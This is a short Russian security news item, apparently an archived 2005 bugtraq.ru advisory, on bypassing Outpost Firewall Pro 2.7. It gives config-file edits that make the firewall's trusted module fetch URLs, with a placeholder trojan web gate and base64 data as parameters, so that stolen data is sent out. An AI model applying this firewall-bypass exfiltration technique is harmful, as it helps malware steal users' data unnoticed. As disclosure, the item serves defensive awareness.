BugTraq.Ru: Обход Outpost 2.7 // версия для печати

https://bugtraq.ru/rsn/archive/2005/09/07.html

Обход Outpost 2.7
dl // 14.09.05 00:56
Проверялась версия Outpost Firewall Pro ver.
[Не забывайте при копировании материала указывать полный адрес источника: //bugtraq.ru/rsn/archive/2005/09/07.html]
2.7.492.5421 (416). Возможна отправка любых данных на web-гейт трояна (напр. pinch 2 pro, a-311 и т.д.), достаточно изменить данные в файлах (пример для русскоязычной версии):

С:\...\Outpost Firewall\outpost.ini
[HttpAlerts]
...
NewsTime=10 //таймаут
NewsEnable=yes //меню->сервис->загружать новости
PluginsTime=10 //таймаут
PluginsEnable=yes //меню->сервис->загружать информацию о модулях
...

С:\...\Outpost Firewall\op_links.ini
NewsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
PluginsPage_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data
PluginsPageAdv_ru=http://www.site.ru/mail.php?a=mail@mail.ru&b=subject&c=base64data

При этом Outpost выдает предупреждение о том, что его главный модуль пытается соединиться с внешним миром, но это выглядит достаточно безобидно.

Источник: $aSH

предложить новость | обсудить | все отзывы (1) [9607]

назад « » вперед

последние новости

ФБР нашла русский след в атаках на древние Cisco // 22.08.25 22:43
Массовый взлом SharePoint // 23.07.25 22:07
Microsoft Authenticator прекращает поддержку паролей // 30.06.25 21:19
Очередное исследование 19 миллиардов паролей показало, что с ними по-прежнему все плохо // 02.05.25 20:42
Оптимизация ввода-вывода как инструмент обхода антивирусов // 30.04.25 23:29
Зловреды выбирают Lisp и Delphi // 30.03.25 23:26
Уязвимости в Mongoose ставят под удар MongoDB // 20.02.25 18:23

Комментарии: